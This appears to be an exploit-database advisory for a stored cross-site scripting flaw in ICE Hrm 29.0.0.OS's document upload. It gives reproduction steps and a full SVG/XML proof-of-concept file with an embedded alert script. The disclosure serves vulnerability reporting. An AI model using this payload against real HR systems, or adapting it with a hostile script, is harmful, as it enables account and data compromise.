ICE Hrm 29.0.0.OS xml upload Stored Cross-Site Scripting

Risk: Low
Local: No
Remote: Yes

# Exploit Title: ICE Hrm 29.0.0.OS - 'xml upload' Stored Cross-Site Scripting (XSS) # Exploit Author: *Piyush Patil *& Rafal Lykowski # Vendor Homepage: # Version: 29.0.0.OS # Tested on: Windows 10 and Kali #Description The file upload feature in ICE Hrm Version 29.0.0.OS allows remote attackers to inject arbitrary HTML or JavaScript via a cross site scripting (XSS) vulnerability. #Steps to Reproduce the issue: 1- Login to ICE Hrm Admin Panel 2- Click on Employees=>Document Management=> Upload a below xml file <?xml version="1.0" standalone="no"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" ""> <svg version="1.1" baseProfile="full" xmlns=""> <rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" /> <script type="text/javascript"> alert("XSS"); </script> </svg> 3- Visit the upload location of file and XSS will get triggered. #Video POC:

Vote for this issue:


Thanks for you vote!


Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021,


Back to Top